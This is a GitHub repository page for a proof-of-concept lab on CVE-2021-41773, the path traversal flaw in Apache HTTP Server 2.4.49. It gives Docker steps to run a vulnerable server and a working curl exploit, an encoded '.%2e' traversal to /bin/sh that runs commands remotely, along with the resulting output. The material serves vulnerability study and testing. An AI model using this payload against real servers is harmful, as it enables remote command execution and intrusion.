Skip to content
/ CVE-2021-41773 Public
forked from knqyf263/CVE-2021-41773

Path traversal in Apache HTTP Server 2.4.49 (CVE-2021-41773)

License

Apache-2.0 license
0 stars 7 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

hbertsch/CVE-2021-41773

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
Dockerfile
Dockerfile
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
my-httpd.conf
my-httpd.conf
 
 

Repository files navigation

CVE-2021-41773 vulnerability

Path traversal vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)

For educational purposes only

Test

Set up the PoC environment

Option 1: From GitHub Container Registry

$ docker run --rm -dit -p 8000:80 ghcr.io/hbertsch/cve-2021-41773

Option 2: Manual Build

$ docker build -t cve-2021-41773 . 
$ docker run --rm -dit -p 8000:80 cve-2021-41773

Confirm it works

Check whether the server is running

$ curl http://localhost:8000
# Result
<html><body><h1>It works!</h1></body></html>

Exploit

Send any command you want like this:

$curl 'http://127.0.0.1:8000/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'echo;ls'
# Result
bash
cat
chgrp
chmod
chown
cp
dash
date
dd
df
dir
dmesg
dnsdomainname
domainname
echo
egrep
false
fgrep
findmnt
grep
gunzip
gzexe
gzip
hostname
ln
login
...

References

About

Path traversal in Apache HTTP Server 2.4.49 (CVE-2021-41773)

Resources

Readme

License

Apache-2.0 license
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases 1

v1.0 Latest
Oct 7, 2021

Packages

No packages published

Languages

  • Dockerfile 100.0%